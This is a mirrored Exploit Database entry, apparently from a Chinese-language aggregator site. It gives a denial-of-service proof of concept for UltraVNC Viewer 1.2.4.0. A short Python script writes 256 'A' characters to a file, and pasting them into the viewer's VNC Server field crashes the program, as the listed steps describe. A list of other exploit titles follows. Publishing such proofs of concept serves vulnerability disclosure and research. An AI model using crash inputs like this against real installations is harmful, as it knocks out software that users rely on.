UltraVNC Viewer 1.2.4.0 – ‘VNCServer’ Denial of Service (PoC)

Exploit Database
114 阅读

作者： chuyreds

日期： 2020-04-06
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/48291/

# Exploit Title:UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer 
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed

cod = "\x41" * 256

f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
f.write(cod)
f.close()

last Exploits
UltraVNC Viewer 1.2.4.0 – ‘VNCServer’ Denial of Service (PoC)的更多信息

Microsoft Windows – ‘nt!NtQueryObject (ObjectNameInformation)’ Kernel Pool Memory Disclosure：
Fake Webcam 6.1 – Local Crash (PoC)：
Apple macOS/iOS – ‘CAMediaTimingFunctionBuiltin’ NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking：
SoX 14.4.2 – Denial Of Service：
WebSSH for iOS 14.16.10 – ‘mashREPL’ Denial of Service (PoC)：
FTP Voyager 16.2.0 – Denial of Service (PoC)：
FCrackZip 1.0 – Local Buffer Overflow (PoC)：
Kaspersky AntiVirus – Certificate Handling Directory Traversal：